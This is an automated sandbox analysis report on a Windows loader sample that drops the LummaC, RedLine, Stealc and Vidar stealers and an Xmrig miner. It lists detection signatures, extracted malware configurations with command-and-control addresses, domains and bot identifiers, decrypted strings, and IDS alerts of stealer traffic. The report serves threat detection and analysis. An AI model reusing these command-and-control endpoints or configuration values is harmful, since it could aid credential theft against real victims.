Windows Analysis Report
gobEmOm5sr.exe

Overview

General Information

Sample name: gobEmOm5sr.exe
renamed because original name is a hash value
Original sample name: 1F389EF6DAC9971FEF4BAD14B3514C26.exe
Analysis ID: 1505384
MD5: 1f389ef6dac9971fef4bad14b3514c26
SHA1: 47e2bfe623d17b4272958a1546dc459695d6d134
SHA256: 65e67f728f8f7694f68156ad4ed80825739968701ea1535291d489ef3dbebe06
Tags: exePrivateLoader
Infos:

Detection

LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Socks5Systemz
Yara detected Stealc
Yara detected Vidar
Yara detected Vidar stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
Name Description Attribution Blogpost URLs Link
xmrig According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection
barindex
Antivirus detection for URL or domain
Source: stamppreewntnq.shop URL Reputation: Label: phishing
Source: condedqpwqm.shop URL Reputation: Label: phishing
Source: locatedblsoqp.shop URL Reputation: Label: phishing
Source: traineiwnqo.shop URL Reputation: Label: malware
Found malware configuration
Source: 0000000E.00000002.2120842089.00000000043E5000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": "147.45.47.36:30035", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
Source: 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199768374681", "https://t.me/edm0d", "https://t.me/fneogr"], "Botnet": "4f1093aa7eebaf755203a00370e22375"}
Source: 42.2.BitLockerToGo.exe.400000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["stamppreewntnq.shop", "evoliutwoqm.shop", "locatedblsoqp.shop", "condedqpwqm.shop", "caffegclasiqwp.shop", "traineiwnqo.shop", "stagedchheiqwo.shop", "millyscroqwp.shop"], "Build id": "a8kafm--@cloudcosmic"}
Source: 31.2.RegAsm.exe.400000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://46.8.231.109/c4754d4f680ead72.php", "Botnet": "default"}
Multi AV Scanner detection for domain / URL
Source: file-link-iota.vercel.app Virustotal: Detection: 8% Perma Link
Source: 240902180529931.tyr.zont16.com Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe ReversingLabs: Detection: 79%
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Virustotal: Detection: 72% Perma Link
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe ReversingLabs: Detection: 87%
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe Virustotal: Detection: 74% Perma Link
Source: C:\Users\userDGHCBAAEHC.exe ReversingLabs: Detection: 54%
Source: C:\Users\userDGHCBAAEHC.exe Virustotal: Detection: 37% Perma Link
Source: C:\Users\userJJJJDAAECG.exe ReversingLabs: Detection: 26%
Source: C:\Users\userJJJJDAAECG.exe Virustotal: Detection: 38% Perma Link
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Virustotal: Detection: 72% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66c6fcb30b9dd_123p[1].exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66c6fcb30b9dd_123p[1].exe Virustotal: Detection: 74% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\install[1].exe Virustotal: Detection: 25% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lamp[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lamp[1].exe Virustotal: Detection: 39% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sgnr[1].exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sgnr[1].exe Virustotal: Detection: 37% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vjgg[1].exe ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vjgg[1].exe Virustotal: Detection: 37% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66d59ef9d4404_premium[1].exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66d59ef9d4404_premium[1].exe Virustotal: Detection: 67% Perma Link
Multi AV Scanner detection for submitted file
Source: gobEmOm5sr.exe ReversingLabs: Detection: 55%
Source: gobEmOm5sr.exe Virustotal: Detection: 53% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\userJJJJDAAECG.exe Joe Sandbox ML: detected
Source: C:\ProgramData\DB Light Pack Engine 9.6.45\DB Light Pack Engine 9.6.45.exe Joe Sandbox ML: detected
Source: C:\Users\userDGHCBAAEHC.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: gobEmOm5sr.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: caffegclasiqwp.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: stamppreewntnq.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: stagedchheiqwo.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: millyscroqwp.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: evoliutwoqm.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: condedqpwqm.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: traineiwnqo.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: locatedblsoqp.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: stamppreewntnq.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: a8kafm--@cloudcosmic

Bitcoin Miner
barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: sslproxydump.pcap, type: PCAP

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe Unpacked PE file: 39.2.newstar.exe.400000.0.unpack
Uses 32bit PE files
Source: gobEmOm5sr.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewStar_is1
Source: unknown HTTPS traffic detected: 173.231.16.77:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 76.76.21.142:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 158.69.225.124:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.2.46:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: gobEmOm5sr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\symbols\exe\premium_gitrep.pdbe source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001207000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdb source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001934000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdbG source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2332767463.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000000.1923341342.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.PDBf1 source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n<C:\Windows\premium_gitrep.pdb source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2233127778.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: PE.pdb source: gobEmOm5sr.exe, 00000000.00000002.1663150655.0000000005790000.00000004.08000000.00040000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001934000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\wMwlL.pdb source: gobEmOm5sr.exe, 00000000.00000002.1663531403.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: premium_gitrep.pdb source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000000.1922223189.00000000007C2000.00000002.00000001.01000000.0000000A.sdmp, yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001256000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000158E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\premium_gitrep.pdbFk<W source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001207000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000153D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: premium_gitrep.pdbx source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000000.1922223189.00000000007C2000.00000002.00000001.01000000.0000000A.sdmp, yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001256000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: githubsoft.pdb source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: mscorlib.resources.pdbV source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001207000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BotClient.pdb source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000000.1922131393.0000000000282000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: ud.pdbWindowsPowerShell\Modules;C:\Windows\system32\WindowsPowe source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000158E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 0dows\symbols\dll\mscorlib.pdb source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.00000000011F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\newPrime_cloud.pdbN source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdb source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2332767463.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: githubsoft.pdb8 source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: n<C:\Windows\newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2221433328.00000000012F9000.00000004.00000010.00020000.00000000.sdmp
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054709 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (GET) : 192.168.2.4:49730 -> 185.143.223.148:80
Source: Network traffic Suricata IDS: 2054710 - Severity 1 - ET MALWARE PrivateLoader CnC Response : 185.143.223.148:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2054711 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (POST) : 192.168.2.4:49730 -> 185.143.223.148:80
Source: Network traffic Suricata IDS: 2046266 - Severity 1 - ET MALWARE [ANY.RUN] RisePro TCP (Token) : 77.105.164.24:50505 -> 192.168.2.4:49754
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49753 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49753 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.4:49753
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49753 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.4:49753
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49753 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2046269 - Severity 1 - ET MALWARE [ANY.RUN] RisePro TCP (Activity) : 192.168.2.4:49754 -> 77.105.164.24:50505
Source: Network traffic Suricata IDS: 2049060 - Severity 1 - ET MALWARE RisePro TCP Heartbeat Packet : 192.168.2.4:49754 -> 77.105.164.24:50505
Source: Network traffic Suricata IDS: 2055482 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop) : 192.168.2.4:49325 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.4:49760 -> 147.45.47.36:30035
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.4:49760 -> 147.45.47.36:30035
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 147.45.47.36:30035 -> 192.168.2.4:49760
Source: Network traffic Suricata IDS: 2055492 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (stamppreewntnq .shop) : 192.168.2.4:49762 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.4:56325 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.4:59406 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055475 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop) : 192.168.2.4:55687 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49764 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 147.45.47.36:30035 -> 192.168.2.4:49760
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49766 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49768 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49771 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.4:53819 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.4:55415 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49779 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49778 -> 147.45.126.10:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49781 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.126.10:80 -> 192.168.2.4:49778
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49781 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.126.10:80 -> 192.168.2.4:49778
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.100:80 -> 192.168.2.4:49781
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49781 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.100:80 -> 192.168.2.4:49781
